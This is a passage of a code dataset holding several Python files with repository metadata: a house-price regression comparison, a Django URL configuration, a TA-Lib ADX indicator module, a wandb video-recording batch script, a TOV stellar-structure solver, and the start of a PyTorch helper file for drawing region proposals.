svm\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import BayesianRidge, LogisticRegression, SGDRegressor, Perceptron, PassiveAggressiveRegressor, RANSACRegressor, TheilSenRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\n# Train and test using the given classifier with k-fold cross-validation\ndef classify(X, y, k, clf):\n\t# Split data into folds\n\tkf = KFold(n_splits=k, shuffle=True)\n\tsplits = kf.split(X)\n\t\n\tabs_err = 0\n\tper_err = 0\n\tcount = 0\n\tr2_scores = 0\n\n\tfor train_index, test_index in splits:\n\t\tX_train, X_test = X[train_index], X[test_index]\n\t\ty_train, y_test = y[train_index], y[test_index]\n\t\tclf.fit(X_train, y_train)\n\t\ty_pred = clf.predict(X_test)\n\n\t\tabs_err += mean_absolute_error(y_test, y_pred)\n\t\tper_err += np.mean(np.abs((y_test - y_pred) / y_test) * 100)\n\t\tr2_scores += r2_score(y_test, y_pred)\n\n\t#Some statistics\n\tfor i in range(len(y_pred)):\n\t\tif np.mean(np.abs((y_test[i]-y_pred[i]))/y_test[i])*100 >= 20:\n\t\t\t'''print(\"True price: \" + str(round(y_test[i], 2)) + \n\t\t\t\t\t \"\\nEst. price: \" + str(round(y_pred[i], 2)) +\n\t\t\t\t\t \"\\nAbsolute error: \" + str(round(np.abs(y_test[i]-y_pred[i]), 2)) +\n\t\t\t\t\t \"\\nPercentage error: \" + str(round(np.mean(np.abs((y_test[i]-y_pred[i]))/y_test[i])*100, 2)) +\n\t\t\t\t\t \"\\nBuilding type: \" + str(round(X_test[i][6], 2)) + \"\\n\")\n\t\t\t'''\n\t\t\tcount += 1\n\n\tprint(\"===========================================================\")\n\tprint(\"Number of properties with >= 20% error: \" + str(count))\n\tprint(\"Mean absolute percentage error: \" + str(round(per_err/k, 2)))\n\tprint(\"Mean absolute error: \" + str(round(abs_err/k, 2)))\n\tprint(\"Mean R2 scores: \" + str(round(r2_scores/k, 2)))\n\tprint(\"\")\n\n\t#Note: plots only last split of data (~650 instances for Vic+Van data)\n\tdif_plot(y_test, y_pred)\n\ndef dif_plot(y_test, y_pred):\n\tplt.rcParams['legend.numpoints'] = 2\n\n\tfig, ax = plt.subplots(figsize=(12,8))\n\n\tfor i in range(len(y_pred)):\n\t\tplt.plot([i, i], [y_pred[i], y_test[i]], c='k', lw=0.5)\n\n\tax.plot(y_pred, 'o', label='Prediction', color='g')\n\tax.plot(y_test, '^', label='Ground Truth', color='r')\n\n\tax.set_xlim((-1, len(y_pred)))\n\t\n\tax.set_yscale('log')\n\tax.set_yticks([100000, 200000, 500000, 1000000, 2500000, 5000000, 10000000, 20000000, 30000000])\n\tax.get_yaxis().set_major_formatter(ticker.ScalarFormatter())\n\n\n\tplt.xlabel('Property Index (i)')\n\tplt.ylabel('Property Price (dollars)')\n\tplt.title('Random Forest Regressor: Ground Truth vs Predicted Property Price')\n\n\tplt.legend(loc=\"upper right\")\n\n\t#For saving a subplot\n\tfig.savefig('./random_forest_graph.png')\n\tplt.show()\n\ndef main():\n\thouses = Utils.get_house_data('../RemaxScrape/remaxDataset2.json', region=\"Victoria\")\n\thouses += Utils.get_house_data(\"../RemaxScrape/remaxVanDataset.json\", region=\"Vancouver\")\n\tprint(\"Total listings: \" + str(len(houses)) + \"\\n\")\n\tX, y = Utils.create_matrices(houses, 10)\n\n\t# Scale feature data a bit (doesn't seem to help much)\n\tX = preprocessing.scale(X) \n\n\tn_splits = 5\n\t\n\t'''\n\tprint(\"Support Vector Regression with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, svm.SVR()) \n\n\tprint(\"Bayesian Ridge Regression with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, BayesianRidge())\n\t#\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, liblinear solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"liblinear\"))\n\t\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, newton-cg solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"newton-cg\"))\n\t\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, lbfgs solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"lbfgs\"))\n\t\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, squared loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"squared_loss\"))\n\t\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, huber loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"huber\"))\n\t\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, epsilon insensitive loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"epsilon_insensitive\"))\n\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, squared epsilon insensitive loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"squared_epsilon_insensitive\"))\n\t\n\tprint(\"Perceptron with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, Perceptron())\n\t\n\t#print(\"Passive-Aggressive Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\t#classify(X, y, n_splits, PassiveAggressiveRegressor())\n\t\n\tprint(\"RANSAC Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, RANSACRegressor())\n\t\n\t#print(\"Theil-Sen Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\t#classify(X, y, n_splits, TheilSenRegressor())\n\t'''\n\tprint(\"Random Forest Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, RandomForestRegressor())\n\t\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "jeremykr/seng474uvic", "sub_path": "Classification/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.model_selection.KFold", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 56, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "utils.Utils.get_house_data", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 84, "usage_type": "name"}, {"api_name": "utils.Utils.get_house_data", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 85, "usage_type": "name"}, {"api_name": "utils.Utils.create_matrices", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 87, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 90, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "37236536112", "text": "from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom django.views.generic.simple import direct_to_template\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom account.openid_consumer import PinaxConsumer\n\n\nif settings.ACCOUNT_OPEN_SIGNUP:\n signup_view = \"account.views.signup\"\nelse:\n signup_view = \"signup_codes.views.signup\"\n\n\nurlpatterns = patterns('',\n url(r'^$', direct_to_template, {\n \"template\": \"homepage.html\",\n }, name=\"home\"),\n \n url(r'^admin/invite_user/$', 'signup_codes.views.admin_invite_user', name=\"admin_invite_user\"),\n url(r'^account/signup/$', signup_view, name=\"acct_signup\"),\n \n (r'^about/', include('about.urls')),\n (r'^account/', include('account.urls')),\n (r'^openid/(.*)', PinaxConsumer()),\n (r'^profiles/', include('rateme_profiles.urls')),\n (r'^notices/', include('notification.urls')),\n (r'^announcements/', include('announcements.urls')),\n# (r'^comments/', include('threadedcomments.urls')),\n \n (r'^admin/(.*)', admin.site.root),\n (r'^pictures/', include('pictures.urls')),\n (r'^avatar/', include('avatar.urls')),\n (r'^judges/', include('judges.urls')),\n)\n\nif settings.SERVE_MEDIA:\n urlpatterns += patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n", "repo_name": "flynhigher/terry-play-ground", "sub_path": "RateMe/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 7, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.settings.ACCOUNT_OPEN_SIGNUP", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.simple.direct_to_template", "line_number": 19, "usage_type": "argument"}, {"api_name": "account.openid_consumer.PinaxConsumer", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.settings.SERVE_MEDIA", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "7360070028", "text": "import sys, os\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/..\")\nfrom jsonHandler import *\nfrom getData import getStocksHighLow, getForexHighLow\nimport talib, numpy, requests, json\n\ndef adxProcess (): \n\t#Load config\n\tconfig = load_json(\"config.json\")\n\tadxParams = config[\"ADX\"]\n\tsecurity = config[\"Security\"][\"CurrentSecurity\"]\n\tdaysBack = config[\"Security\"][security][\"dataParams\"][\"daysBack\"]\n\n\t#Get high, low, and close prices from getData.py\n\t#Stocks\n\tif (security == \"Stocks\"):\n\t\thighAsk, lowAsk, closeAsk = getStocksHighLow ()\n\t#Forex\n\telse:\n\t\thighAsk, lowAsk, closeAsk = getForexHighLow ()\n\n\t#Format for talib\n\thighAsk = numpy.array([float(x) for x in highAsk])\n\tlowAsk = numpy.array([float(x) for x in lowAsk])\n\tcloseAsk = numpy.array([float(x) for x in closeAsk])\n\t\n\t#Get ADX from talib\n\tADX = talib.ADX(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\tplusDirection = talib.PLUS_DI(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\tminusDirection = talib.MINUS_DI(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\n\t#Create array of dictionaries to add to processed data\n\tadx = []\n\tfor i in range (len(highAsk) - daysBack, len(highAsk)):\n\t\tadxPart = {\n\t\t\t\t'ADX': ADX[i],\n\t\t\t\t'+DI': plusDirection[i],\n\t\t\t\t'-DI': minusDirection[i]\n\t\t}\n\t\tadx.append(adxPart)\n\n\treturn adx\n", "repo_name": "sampocs/UW-ATC", "sub_path": "deps/processing/ADX.py", "file_name": "ADX.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "getData.getStocksHighLow", "line_number": 17, "usage_type": "call"}, {"api_name": "getData.getForexHighLow", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "talib.ADX", "line_number": 28, "usage_type": "call"}, {"api_name": "talib.PLUS_DI", "line_number": 29, "usage_type": "call"}, {"api_name": "talib.MINUS_DI", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "31174048142", "text": "import os\nimport sys\nimport subprocess\n\nfrom typarse import BaseParser\nimport wandb\n\n\nclass Parser(BaseParser):\n project_name: str\n env_path: str\n source: str = \"titan\"\n skip: int = 0\n force: bool = False\n only_finished: bool = False\n\n _help = {\n \"project_name\": \"Name of the wandb project\",\n \"env_path\": \"Path to the Unity environment binary\",\n \"source\": \"Source of the run\",\n \"skip\": \"Number of runs to skip\",\n \"force\": \"Whether to force the recording even if the video already exists\",\n \"only_finished\": \"Whether to only record videos for finished runs\",\n }\n\n _abbrev = {\n \"project_name\": \"p\",\n \"env_path\": \"e\",\n \"source\": \"c\",\n \"skip\": \"s\",\n \"force\": \"f\",\n \"only_finished\": \"o\",\n }\n\n\ndef has_video(run: wandb.apis.public.Run):\n return any(key.startswith('video') for key in run.summary.keys())\n\n\n# Sketch of the code to be generated\n# Iterate over all runs in the project\n# For each run, check if any key in `run.summary` starts with `video`\n# If it does, ignore the run unless `force` is set to True\n# If it doesn't, pull the config and the model, and use it to record a new video\n\n\nif __name__ == \"__main__\":\n args = Parser()\n\n api = wandb.Api()\n runs = list(api.runs(args.project_name))\n runs = runs[args.skip:]\n\n num_runs = len(runs)\n\n for i, run in enumerate(runs):\n print(f\"Processing run {i + 1}/{num_runs}\")\n if not args.force and has_video(run):\n print(f\"Skipping {run.name}\")\n continue\n\n run_path = '/'.join(run.path)\n\n if args.only_finished and run.state != 'finished':\n print(f\"Skipping {run.name} because it is not finished\")\n continue\n\n # Run `do_record_from_wandb.py` as a separate process\n\n process = subprocess.Popen(\n [sys.executable, \"do_record_from_wandb.py\", \"--run_path\", run_path, \"--env_path\", args.env_path, \"--source\", args.source],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n for line in iter(process.stdout.readline, b''):\n print(line.decode().strip())\n\n process.stdout.close()\n process.wait()\n\n stderr = process.stderr.read().decode()\n if stderr:\n print(\"Error: \", stderr)\n process.stderr.close()\n", "repo_name": "RedTachyon/coltra-rl", "sub_path": "scripts/record_from_wandb.py", "file_name": "record_from_wandb.py", "file_ext": "py", "file_size_in_byte": 2362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typarse.BaseParser", "line_number": 9, "usage_type": "name"}, {"api_name": "wandb.apis", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wandb.Api", "line_number": 50, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 71, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "30967429146", "text": "import numpy as np\nfrom scipy.integrate import quad\nfrom scipy.integrate import odeint\nfrom functions import minP,findXPoint\nimport matplotlib.pyplot as plt\n\ndef tauf1(r,y0):\n if y0 <= 10:\n if r < 1e-10:\n return 0.1\n elif r <= 1e-1:\n return 0.01\n elif r > 1e-1:\n return 0.001\n elif y0 > 10:\n if r < 1e-10:\n return 0.5\n elif r <= 1e-1:\n return 0.1\n elif r > 1e-1:\n return 0.001\n\npi = np.pi\ndef EosRho(k):\n m_f =1\n return (1/(pi**2))*(k**2)*(np.sqrt(m_f**2 + k**2))\n \ndef EosP(k):\n m_f =1\n return (1/(3*pi**2))*((k**4)/(np.sqrt(m_f**2 + k**2)))\n\ndef intTerm(y,z):\n return (((1/(3*pi**2)))**2)*(y**2)*(z**6)\n\ndef TOVintEoS(rho_0,y):\n\n kmin = 0\n kmax = np.array([])\n k1 = np.linspace(1e-16,1e-15,500,endpoint=True)\n\n for i in range(0,21):\n k = k1*(10**i)\n kmax = np.append(kmax,k)\n\n EoSrho1 = np.array([])\n EoSP1 = np.array([])\n\n for i in range(len(kmax)):\n a =quad(EosP,kmin,kmax[i]) \n b =quad(EosRho,kmin,kmax[i]) \n EoSP1 = np.append(EoSP1,a[0]+intTerm(y,kmax[i]))\n EoSrho1 = np.append(EoSrho1,b[0]+intTerm(y,kmax[i]))\n\n EoSP = np.unique(EoSP1)\n EoSrho = np.unique(EoSrho1)\n\n def Pforrho(rho):\n i = min(EoSrho,key=lambda x:abs(x-rho)) #find closest value to P0\n a = np.where(EoSrho==i) # index of closest point to P0\n index =a[0][0] #index of closest P0 (a outputs 2 dim. array)\n\n p1 = EoSP[index]\n rho1 = EoSrho[index]\n\n if rho > EoSrho[index]:\n p2 = EoSP[index+1]\n rho2 = EoSrho[index+1]\n f = findXPoint(p1,p2,rho1,rho2,rho)\n # f2 = interp1d([p1,p2],[rho1,rho2])\n\n elif rho < EoSrho[index]:\n p2 = EoSP[index-1]\n rho2 = EoSrho[index-1]\n f = findXPoint(p2,p1,rho2,rho1,rho)\n\n elif rho == EoSrho[index]:\n f = EoSP[index]\n\n return f\n\n def rhof(P_v): # Pressure on x-axis and Rho on y-axis\n i = min(EoSP,key=lambda x:abs(x-P_v)) #find closest value to P0\n a = np.where(EoSP==i) # index of closest point to P0\n index =a[0][0] #index of closest P0 (a outputs 2 dim. array)\n p1 = EoSP[index]\n rho1 = EoSrho[index]\n\n if P_v > EoSP[index]:\n p2 = EoSP[index+1]\n rho2 = EoSrho[index+1]\n f1 = findXPoint(rho1,rho2,p1,p2,P_v)\n # f2 = interp1d([p1,p2],[rho1,rho2])\n\n elif P_v < EoSP[index]:\n p2 = EoSP[index-1]\n rho2 = EoSrho[index-1]\n f1 = findXPoint(rho2,rho1,p2,p1,P_v)\n # f2 = interp1d([p2,p1],[rho2,rho1])\n elif P_v == EoSP[index]:\n f1 = EoSrho[index]\n\n return f1\n\n P0 = Pforrho(rho_0)\n\n def diff(x,r):\n P = x[0]\n m = x[1]\n # TOV\n k = (rho)/(r)\n k1 = 1 + (P/rho)\n k2 = m + ((4*np.pi*(r**3)*P))\n k3 = (r - (2*m))**(-1)\n dPdr = -(k)*(k1*k2*k3) \n # Mass\n dmdr = 4*np.pi*(r**2)*rho\n return [dPdr,dmdr]\n\n eps = np.finfo(float).eps\n \n rho = rho_0\n x0 = [P0,0]\n int_P = P0\n limit = minP(int_P)\n\n # tau = tauR(rho)\n tau = tauf1(P0,y)\n r_new = 1e-10\n t_span =np.linspace(r_new,tau+r_new,10)\n \n P_array = np.array([])\n r_array = np.array([])\n m_array = np.array([])\n\n while True:\n # print(rho)\n \n sol = odeint(diff,x0,t_span)\n P = sol[:,0] \n m = sol[:,1]\n\n # print(P[-1],rho)\n\n if (P <= limit).any():\n index = np.where(P<= limit)\n i = index[0][0]\n if i ==0:\n R = r_array[-1][-1]\n M = m_array[-1][-1]\n else:\n R = t_span[i-1]\n M = m[i-1]\n compactness = R/M\n print('Star found with R= ',R,'& M=',M, 'Compactness(R/M) = ',(R)/(M),'(1 Step Profile) with',len(r_array),'steps')\n break\n\n P_array = np.append(P_array,P)\n r_array = np.append(r_array,t_span)\n m_array = np.append(m_array,m)\n rho = rhof(P[-1])\n # tau = tauR(rho)\n tau = tauf1(P[-1],y)\n t_span = np.linspace(t_span[-1],tau+t_span[-1],10)\n x0 = [P[-1],m[-1]]\n\n R1 = R\n M1 = M\n comp = compactness\n \n return R1,M1,r_array,P_array,m_array,comp\n\n# TOV test\n# sol = TOVintEoS(10**3,1000)\n# plt.plot(sol[2],sol[3])\n# plt.show()\n\n\n\n# y = [0.01,1,10,10**2,10**3]\ny = np.array([])\ny1 = np.linspace(0.01,1,5,endpoint=True)\nfor i in range(0,3):\n h = y1*(10**i)\n y = np.append(y,h)\n# print(y)\nrho1 = np.linspace(10**(-8),10**(-7),10,endpoint=True)\n\nrho = np.array([])\nfor i in range(0,9):\n k = rho1*(10**i)\n rho = np.append(rho,k)\n\nR = np.array([])\nM = np.array([])\nfor j in range(len(y)):\n for i in range(len(rho)):\n print('Star #',i,'rho=',rho[i],'y=',y[j])\n sol = TOVintEoS(rho[i],y[j])\n # plt.plot(sol[2],sol[4],color='red')\n M = np.append(M,sol[1])\n R = np.append(R,sol[0])\n\n # plt.loglog(R,M,'.',color='black')\n plt.loglog(R, M, color='black', marker='o', markersize=0.01)\n# plt.plot(R,M,color='red')\n\nplt.xlim([1,1e4])\nplt.ylim([1e-3,200])\nplt.xlabel('dimensionaless $R$')\nplt.ylabel('dimensionaless $M(R)$')\nplt.show()", "repo_name": "EulerMacaroni/stars", "sub_path": "RvsM_intEoS.py", "file_name": "RvsM_intEoS.py", "file_ext": "py", "file_size_in_byte": 5324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.pi", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.integrate.quad", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.integrate.quad", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 68, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 83, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 91, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.finfo", "line_number": 119, "usage_type": "call"}, {"api_name": "functions.minP", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.loglog", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}]} +{"seq_id": "14458011628", "text": "import torch\nimport torch.nn as nn\nimport os\nimport random\nimport cv2\nimport numpy as np \n\ndef draw_proposals(position_matrix, img, extract=5):\n if os.path.exists(\"/home/jhsu/yjl/lite/draw_proposals/\"):\n pass\n else:\n os.mkdir(\"/home/jhsu/yjl/lite/draw_proposals/\")\n # red, blue, green, yellow, black\n # (14, 3, 511, 511)\n mean = np.array([0.40789654, 0.44719302, 0.47026115],\n dtype=np.float32).reshape(3, 1, 1)\n std = np.array([0.28863828, 0.27408164, 0.27809835],\n dtype=np.float32).reshape(3, 1, 1)\n img = (img[0].detach().cpu().numpy() * std + mean) * 255\n # 再把图片transpose成标准的样子\n img = img.astype(np.uint8).transpose(1, 2, 0)\n img = img.copy()\n # img = np.array(img.transpose(2, 0).cpu())\n a = [(0, 0, 255), (255, 0, 0), (0, 100, 0), (0, 255, 255), (0, 0, 0)]\n # print(80*\"K\")\n # print(type(img))\n # print(img.shape)\n for idx, position in enumerate(position_matrix):\n y = position[0].item()\n x = position[1].item()\n # print(x, y)\n # if x <= extract // 2:\n # x = extract // 2\n # elif x + extract // 2 >= img.shape[1] - 1:\n # x = img.shape[1] - extract // 2 - 1\n # if y <= extract // 2:\n # y = extract // 2\n # elif y + extract // 2 >= img.shape[1] - 1:\n # y = img.shape[1] - extract // 2 - 1\n # print(x, y)\n # color = BGR\n img = cv2.circle(img, center=(x*8, y*8), radius=extract, color=a[idx // 50], thickness=-1)\n # img = cv2.rectangle(img, (x*8 - extract*8, y*8 - extract*8), (x*8 + extract*8, y*8 + extract*8), color=a[idx // 50])\n count = random.randint(0, 10000)\n cv2.imwrite(\"/home/jhsu/yjl/lite/draw_proposals/iamge_\" + str(count) + \".jpg\", img)\n print(\"save img ok!!!\")\n\ndef save_tensor(a, BATCH, C, H, W):\n print(a.size())\n a = a.numpy()\n with open(\"/home/jhsu/yjl/lite/core/models/py_utils/save_tensor.txt\", 'w') as f:\n f.write(\"[\")\n for batch, n in enumerate(a):\n f.write(\"[\")\n for x, i in enumerate(n):\n f.write(\"[\")\n for y, j in enumerate(i):\n f.write(\"[\")\n for z, k in enumerate(j):\n if z == W:\n f.write(str(k))\n else:\n f.write(str(k) + \", \")\n if y == H and x != C and batch != BATCH:\n f.write(\"]],\" + \"\\n\")\n elif y == H and x == C and batch != BATCH:\n f.write(\"]]],\" + \"\\n\")\n elif batch == BATCH and y == H and x == C:\n f.write(\"]]]]\" + \"\\n\")\n else:\n f.write(\"],\" + \"\\n\")\n f.write(\"\\n\")\n print(\" save done!\")\n\ndef extract_fa(fm, x, y, extract):\n x = int(x)\n y = int(y)\n # x轴坐标变换\n if x <= extract // 2:\n x = extract // 2\n elif x + extract // 2 >= fm.size(1) - 1:\n x = fm.size(1) - extract // 2 - 1\n \n # y轴坐标变换\n if y <= extract // 2:\n y = extract // 2\n elif y + extract // 2 >= fm.size(2) - 1:\n y = fm.size(2) - extract // 2 - 1\n # 截取\n if extract == 3:\n for_fa = fm[:, x - 1:x + extract - 1, y - 1:y + extract - 1]\n elif extract == 5:\n for_fa = fm[:, x - 2:x + extract - 2, y - 2:y + extract - 2]\n else:\n for_fa = fm[:, x - 3:x + extract - 3, y - 3:y + extract - 3]\n # print(for_fa.size())\n return for_fa\n\n\ndef extract_fg(x, y, w, h):\n '''\n 传入一个kp\n return一个3*3*7的tensor\n '''\n 